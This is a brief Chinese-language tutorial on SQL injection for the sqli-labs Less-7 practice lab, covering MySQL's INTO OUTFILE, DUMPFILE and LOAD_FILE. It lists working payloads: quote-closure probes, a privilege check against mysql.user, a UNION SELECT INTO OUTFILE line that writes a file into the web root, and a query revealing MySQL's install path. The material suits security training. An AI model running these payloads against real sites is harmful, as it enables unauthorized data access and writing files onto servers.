0x00前言
这次注入主要是针对PHP来说的。如果通过dump错误命令来进行错误盲注。
0x01 前置知识
outfile函数
说明
将表的内容到处为一个文本文件。
格式
select [列名] FROM table [where 语句] into outfile ‘目标文件’ [OPTION]
dumpfile
将表的内容导出为一个文本文件,一次到处一行
load_file
将数据导入mysql
0x02 知识
尝试判断:
(1)’–+
(2)’)–+
(3)’))–+
权限测试:
and (select count(*)from mysql.user)>0 --+
outfile测试:
id=1')) union select 1,2,3 into outfile 'D:/phpStudy/www/sqli-labs-master/less-7/1.txt'
获取mysql的绝对路径
select @@basedir as basePath from dual